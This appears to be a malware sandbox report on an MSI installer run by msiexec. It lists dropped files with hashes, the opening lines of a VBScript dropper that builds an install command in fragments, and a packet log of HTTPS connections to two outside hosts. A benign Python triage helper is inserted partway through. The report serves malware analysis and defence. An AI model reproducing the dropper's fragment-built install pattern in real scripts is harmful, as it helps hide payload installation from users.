                                                                                                            SHA-512:56956D92190364BFC7D60DA307325E7A5390C12AF8B8D2C983CB93D87EA771C8CB8767263B906B48F51B9E927FD37A8864C33B13D91B20E192E88AF5B665AEF5
                                                                                                            Malicious:false
                                                                                                            Preview:...@IXOS.@.....@5.}Y.@.....@.....@.....@.....@.....@......&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}..dermys..Slf.msi.@.....@.....@.....@........&.{02DCC2F2-67E6-46B0-92E0-2CB394AB055F}.....@.....@.....@.....@.......@.....@.....@.......@......dermys......Rollback..Annulation de l'action: ....RollbackCleanup%.Effacement des fichiers de sauvegarde..Fichier: [1]...@.......@........ProcessComponents9.M.i.s.e. ... .j.o.u.r. .d.e.s. .i.n.f.o.r.m.a.t.i.o.n. .d.'.e.n.r.e.g.i.s.t.r.e.m.e.n.t. .d.u. .c.o.m.p.o.s.a.n.t....@.....@.....@.]....&.{0E0C50F8-B210-4B4D-91B3-D1FB7FE78CFA}0.C:\Users\user\AppData\Roaming\Germys\dermys\.@.......@.....@.....@......&.{BA5264B4-F3AE-4F52-99B5-3968C5A81E6A}".01:\Software\Germys\dermys\Version.@.......@.....@.....@......&.{6B83B1C9-08BB-4AEA-A6A8-8797A2558FDB}$.C:\Users\user\AppData\Local\All\.@.......@.....@.....@......&.{F74533CE-84F1-400D-ABB3-76E2590644A5}).C:\Users\user\AppData\Local\All\Form\.@.......@.....@.....@......&.{80922E60-CA5C-47B6-8B4C-
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {02DCC2F2-67E6-46B0-92E0-2CB394AB055F}, Number of Words: 10, Subject: dermys, Author: Germys, Name of Creating Application: dermys, Template: ;1036, Comments: Cette base de données d'installation contient le code et les données nécessaires à l'installation de dermys., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3581440
                                                                                                            Entropy (8bit):7.741428780274999
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:49152:vm5X8r6F5mCmR+juZZZL+H9IyKficUAG595WpZsNAaudSIuvLZ8:co6wZLSIX6cZGZWUNAaudgZ
                                                                                                            MD5:6F92F923D8F87AFE5FE757FF2FF56951
                                                                                                            SHA1:44780713A7026B9B0FF3CADEAFFACB3CC3584ECA
                                                                                                            SHA-256:6ED0C218B751EC93293B5922E783B7A9B147A3C7CD6070022CD707050108D321
                                                                                                            SHA-512:100DF666E8C5B4C2E21DE703FE7210A41DAEDF1480E1FE4B7388AA63DD51ECCBE46E141A275EF61061C97CF3CD268A129CFD5FA0E290E4525B07915789713F0A
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.5628784200137806
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:28PhPuRc06WXJKFT5rS6MGczSyAEbCyN96uSiOSIT:JhP1BFT+Gcz4wCa6WO
                                                                                                            MD5:4B21D53B3C9EAC3FD4FC46431A7D2114
                                                                                                            SHA1:CCB19A62D1A0C554D52524D764356CEDE0D6E3A2
                                                                                                            SHA-256:F1CD201632FE1CE8FEEFC3B5A40A16FBCB84A79B78BCFFB68D5DC27908234CDD
                                                                                                            SHA-512:C9F2DBA413344211AA29BBBC8E0E3B73AD7B3495AAC95BA47F79A246898CE2FE7A63EB9DAC9475FFA53DDCDDD941CB1087FECC061E0947BF1B7066BF5FC7218D
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.5628784200137806
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:28PhPuRc06WXJKFT5rS6MGczSyAEbCyN96uSiOSIT:JhP1BFT+Gcz4wCa6WO
                                                                                                            MD5:4B21D53B3C9EAC3FD4FC46431A7D2114
                                                                                                            SHA1:CCB19A62D1A0C554D52524D764356CEDE0D6E3A2
                                                                                                            SHA-256:F1CD201632FE1CE8FEEFC3B5A40A16FBCB84A79B78BCFFB68D5DC27908234CDD
                                                                                                            SHA-512:C9F2DBA413344211AA29BBBC8E0E3B73AD7B3495AAC95BA47F79A246898CE2FE7A63EB9DAC9475FFA53DDCDDD941CB1087FECC061E0947BF1B7066BF5FC7218D
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.2530905118399702
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:zIXuSrO+gFXJ7T5KS6MGczSyAEbCyN96uSiOSIT:EXF6jTPGcz4wCa6WO
                                                                                                            MD5:EAA8D1CE7E1DE885E0407E7C4321CABE
                                                                                                            SHA1:132C769D017A5A22B073DAFAB186B6BE3D9B357E
                                                                                                            SHA-256:DC504DC8A51A690EF616E3332C62946C849B1FD4F3E859484FEA772333CF6974
                                                                                                            SHA-512:705C4FC98BD6AFB4460D346308A1B9CB009B6D1A411393EB67800896A3B3A0DE0C681C5E5B1A1B96B4445E353E02360F425C655DE198B1022B4171072EDF0389
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):73728
                                                                                                            Entropy (8bit):0.13704056501880332
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:sTxkZipVknkZipVkXAEVkyjCyNV3+bpGOsGgSi+4woplY+42SDWWF:sTkSTSyAEbCyN96uSiHs2S6M
                                                                                                            MD5:8225023868D0D5749ED47B405A76831A
                                                                                                            SHA1:A91A62CB3CF6BA35A2D0CFCB916C0A6E52DC7BB2
                                                                                                            SHA-256:70E34C3B77607DE89F56822B0F2AE5EA91DED6C00C776BE213EE5349E7745E51
                                                                                                            SHA-512:561EA2C21FC400777A6F9CF77437A52227305D696F05523260713174EFB74DB2EB037194D2BDB5E33AA69A63375E3E1F1F4038B8D4FE102D2B22BFB6A76AFBFA
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.5628784200137806
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:28PhPuRc06WXJKFT5rS6MGczSyAEbCyN96uSiOSIT:JhP1BFT+Gcz4wCa6WO
                                                                                                            MD5:4B21D53B3C9EAC3FD4FC46431A7D2114
                                                                                                            SHA1:CCB19A62D1A0C554D52524D764356CEDE0D6E3A2
                                                                                                            SHA-256:F1CD201632FE1CE8FEEFC3B5A40A16FBCB84A79B78BCFFB68D5DC27908234CDD
                                                                                                            SHA-512:C9F2DBA413344211AA29BBBC8E0E3B73AD7B3495AAC95BA47F79A246898CE2FE7A63EB9DAC9475FFA53DDCDDD941CB1087FECC061E0947BF1B7066BF5FC7218D
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.2530905118399702
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:zIXuSrO+gFXJ7T5KS6MGczSyAEbCyN96uSiOSIT:EXF6jTPGcz4wCa6WO
                                                                                                            MD5:EAA8D1CE7E1DE885E0407E7C4321CABE
                                                                                                            SHA1:132C769D017A5A22B073DAFAB186B6BE3D9B357E
                                                                                                            SHA-256:DC504DC8A51A690EF616E3332C62946C849B1FD4F3E859484FEA772333CF6974
                                                                                                            SHA-512:705C4FC98BD6AFB4460D346308A1B9CB009B6D1A411393EB67800896A3B3A0DE0C681C5E5B1A1B96B4445E353E02360F425C655DE198B1022B4171072EDF0389
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.2530905118399702
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:zIXuSrO+gFXJ7T5KS6MGczSyAEbCyN96uSiOSIT:EXF6jTPGcz4wCa6WO
                                                                                                            MD5:EAA8D1CE7E1DE885E0407E7C4321CABE
                                                                                                            SHA1:132C769D017A5A22B073DAFAB186B6BE3D9B357E
                                                                                                            SHA-256:DC504DC8A51A690EF616E3332C62946C849B1FD4F3E859484FEA772333CF6974
                                                                                                            SHA-512:705C4FC98BD6AFB4460D346308A1B9CB009B6D1A411393EB67800896A3B3A0DE0C681C5E5B1A1B96B4445E353E02360F425C655DE198B1022B4171072EDF0389
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
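Several of the msiexec.exe drops above share identical hashes: the 512-byte entries with entropy 0.0 (MD5 BF619EAC..., SHA-256 076A27C7...) are the same file written repeatedly, as are the 20480-byte and 32768-byte compound-document files. The following is an added triage helper, not part of the Joe Sandbox report: it recomputes the digests of a 512-byte run of null bytes to confirm that those entries are zero-filled blocks rather than payloads, recomputes the report's "Entropy (8bit)" measure (Shannon entropy in bits per byte), and collapses the dropped-file list by SHA-256 so an analyst sees four distinct artifacts instead of ten entries. The DROPPED list is transcribed from the entries in this part of the report (only the fields used here); everything else is assumed.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the same scale as the report's
    "Entropy (8bit)" field. A run of identical bytes scores 0.0; a
    uniform byte distribution scores 8.0."""
    if not data:
        return 0.0
    n = len(data)
    h = -sum((c / n) * math.log2(c / n) for c in Counter(data).values())
    return max(0.0, h)  # normalise the -0.0 that a single-symbol input yields


def digests(data: bytes) -> dict:
    """MD5/SHA-1/SHA-256 as upper-case hex, matching the report's casing."""
    return {
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
    }


# Digests of one 512-byte block of null bytes (a blank disk sector).
ZERO_SECTOR = digests(b"\x00" * 512)


def is_zero_sector(record: dict) -> bool:
    """True when a dropped-file record is exactly a 512-byte null block."""
    return record["size"] == 512 and record["sha256"] == ZERO_SECTOR["sha256"]


# Transcribed from the dropped-file entries above (size, type, SHA-256 only).
DROPPED = [
    {"size": 512,   "type": "data", "sha256": "076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560"},
    {"size": 20480, "type": "Composite Document File V2 Document", "sha256": "F1CD201632FE1CE8FEEFC3B5A40A16FBCB84A79B78BCFFB68D5DC27908234CDD"},
    {"size": 32768, "type": "Composite Document File V2 Document", "sha256": "DC504DC8A51A690EF616E3332C62946C849B1FD4F3E859484FEA772333CF6974"},
    {"size": 73728, "type": "data", "sha256": "70E34C3B77607DE89F56822B0F2AE5EA91DED6C00C776BE213EE5349E7745E51"},
    {"size": 512,   "type": "data", "sha256": "076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560"},
    {"size": 512,   "type": "data", "sha256": "076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560"},
    {"size": 20480, "type": "Composite Document File V2 Document", "sha256": "F1CD201632FE1CE8FEEFC3B5A40A16FBCB84A79B78BCFFB68D5DC27908234CDD"},
    {"size": 32768, "type": "Composite Document File V2 Document", "sha256": "DC504DC8A51A690EF616E3332C62946C849B1FD4F3E859484FEA772333CF6974"},
    {"size": 32768, "type": "Composite Document File V2 Document", "sha256": "DC504DC8A51A690EF616E3332C62946C849B1FD4F3E859484FEA772333CF6974"},
    {"size": 512,   "type": "data", "sha256": "076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560"},
]


def triage(records: list) -> dict:
    """Collapse dropped-file records by SHA-256. Returns a mapping of
    sha256 -> {count, size, type, zero_sector} so repeated writes of the
    same bytes show up as one artifact with a count."""
    summary = {}
    for r in records:
        entry = summary.setdefault(
            r["sha256"],
            {"count": 0, "size": r["size"], "type": r["type"], "zero_sector": is_zero_sector(r)},
        )
        entry["count"] += 1
    return summary


if __name__ == "__main__":
    for sha, info in triage(DROPPED).items():
        tag = "zero-filled sector" if info["zero_sector"] else info["type"]
        print(f"{sha[:16]}...  x{info['count']}  {info['size']:>6} B  {tag}")
```

Run stand-alone, the script reduces the ten entries to four artifacts and marks the 512-byte one as a null block; only the 73728-byte "data" file and the two compound-document files are worth opening in a hex editor. The compound documents are still low entropy (1.25 and 1.56 bits per byte) and flagged "Cannot read section info", which is consistent with mostly empty containers, so treat the hash match, not the size, as the thing to pivot on.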
File type:ASCII text, with CRLF line terminators
Entropy (8bit):4.9168174191063745
TrID:
File name:secondaryTask.vbs
File size:876 bytes
MD5:183d51767fe58e2bd256688315d25709
SHA1:2c0f959b61081a10a085ad8e8f8741a69e2d9934
SHA256:23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
SHA512:f5c06582247afab9d6f3c60b62334ed93d4ee7e447b0299e8959dbec5620def6fb1a8ea17e3c3537b4e7ff2c6661b5396e78e1688ec6267076b01068572e76ed
SSDEEP:24:PAilGdehX66xyIpDkJbJ4CQjamgX3TX83qpz/7:P9GaZpDkNSKZzD
TLSH:6B116F4D8EBE8673EDB403F255FF31848BCC640180A9541F25A7A8342681C0587676DF
File Content Preview:Option Explicit....Dim WshShell, part1, part2_1, part2_2, part2_3, part2_4, part3, part4, installCommand....' Create instances of the required objects..Set WshShell = CreateObject("WScript.Shell")....' Sleep for 5 seconds before running the installation..
Icon Hash:68d69b8f86ab9a86
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 30, 2024 01:25:00.192768097 CET  49707        443        192.168.2.6      20.233.83.145
Nov 30, 2024 01:25:00.192809105 CET  443          49707      20.233.83.145    192.168.2.6
Nov 30, 2024 01:25:00.192886114 CET  49707        443        192.168.2.6      20.233.83.145
Nov 30, 2024 01:25:00.194375992 CET  49707        443        192.168.2.6      20.233.83.145
Nov 30, 2024 01:25:00.194389105 CET  443          49707      20.233.83.145    192.168.2.6
Nov 30, 2024 01:25:01.894823074 CET  443          49707      20.233.83.145    192.168.2.6
Nov 30, 2024 01:25:01.894910097 CET  49707        443        192.168.2.6      20.233.83.145
Nov 30, 2024 01:25:01.986743927 CET  49707        443        192.168.2.6      20.233.83.145
Nov 30, 2024 01:25:01.986778021 CET  443          49707      20.233.83.145    192.168.2.6
Nov 30, 2024 01:25:01.987207890 CET  443          49707      20.233.83.145    192.168.2.6
Nov 30, 2024 01:25:02.037473917 CET  49707        443        192.168.2.6      20.233.83.145
Nov 30, 2024 01:25:02.063817978 CET  49707        443        192.168.2.6      20.233.83.145
Nov 30, 2024 01:25:02.107338905 CET  443          49707      20.233.83.145    192.168.2.6
Nov 30, 2024 01:25:03.256278992 CET  443          49707      20.233.83.145    192.168.2.6
Nov 30, 2024 01:25:03.256659985 CET  443          49707      20.233.83.145    192.168.2.6
Nov 30, 2024 01:25:03.256726980 CET  443          49707      20.233.83.145    192.168.2.6
Nov 30, 2024 01:25:03.256737947 CET  49707        443        192.168.2.6      20.233.83.145
Nov 30, 2024 01:25:03.256791115 CET  49707        443        192.168.2.6      20.233.83.145
Nov 30, 2024 01:25:03.256908894 CET  49707        443        192.168.2.6      20.233.83.145
Nov 30, 2024 01:25:03.256926060 CET  443          49707      20.233.83.145    192.168.2.6
Nov 30, 2024 01:25:03.256936073 CET  49707        443        192.168.2.6      20.233.83.145
Nov 30, 2024 01:25:03.256939888 CET  443          49707      20.233.83.145    192.168.2.6
Nov 30, 2024 01:25:03.399682045 CET  49709        443        192.168.2.6      185.199.108.133
Nov 30, 2024 01:25:03.399729967 CET  443          49709      185.199.108.133  192.168.2.6
Nov 30, 2024 01:25:03.399796963 CET  49709        443        192.168.2.6      185.199.108.133
Nov 30, 2024 01:25:03.400105953 CET  49709        443        192.168.2.6      185.199.108.133
Nov 30, 2024 01:25:03.400118113 CET  443          49709      185.199.108.133  192.168.2.6
Nov 30, 2024 01:25:04.664747953 CET  443          49709      185.199.108.133  192.168.2.6
Nov 30, 2024 01:25:04.664851904 CET  49709        443        192.168.2.6      185.199.108.133
Nov 30, 2024 01:25:04.670922995 CET  49709        443        192.168.2.6      185.199.108.133
Nov 30, 2024 01:25:04.670933008 CET  443          49709      185.199.108.133  192.168.2.6
Nov 30, 2024 01:25:04.671148062 CET  443          49709      185.199.108.133  192.168.2.6
Nov 30, 2024 01:25:04.672833920 CET  49709        443        192.168.2.6      185.199.108.133
Nov 30, 2024 01:25:04.719331026 CET  443          49709      185.199.108.133  192.168.2.6
Nov 30, 2024 01:25:05.255795002 CET  443          49709      185.199.108.133  192.168.2.6
Nov 30, 2024 01:25:05.256213903 CET  443          49709      185.199.108.133  192.168.2.6
Nov 30, 2024 01:25:05.256233931 CET  443          49709      185.199.108.133  192.168.2.6
Nov 30, 2024 01:25:05.256254911 CET  443          49709      185.199.108.133  192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.256261110 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.256289005 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.256304979 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.264250040 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.264297009 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.264312983 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.272631884 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.272708893 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.272721052 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.289444923 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.289490938 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.289501905 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.289518118 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.289557934 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.375895023 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.428154945 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.457034111 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.460969925 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.461045980 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.461078882 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.469281912 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.469346046 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.469367981 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.477628946 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.477719069 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.477745056 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.485905886 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.485991001 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.486011982 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.494187117 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.494261026 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.494282007 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.502469063 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.502551079 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.502566099 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.518982887 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.519026041 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.519073963 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.519088030 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.519141912 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.525465012 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.531902075 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.531974077 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.531987906 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.538423061 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.538485050 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.538499117 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.584410906 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.584438086 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.631293058 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.658416986 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.658478975 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.658596992 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.658627987 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689162970 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689173937 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689209938 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689234972 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689241886 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689291954 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.689306021 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689332008 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689352036 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.720921993 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.720941067 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.720962048 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.720968962 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.720973015 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.721002102 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.721066952 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.721087933 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.721123934 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.752839088 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.752863884 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.752887011 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.752892971 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.753022909 CET49709443192.168.2.6185.199.108.133
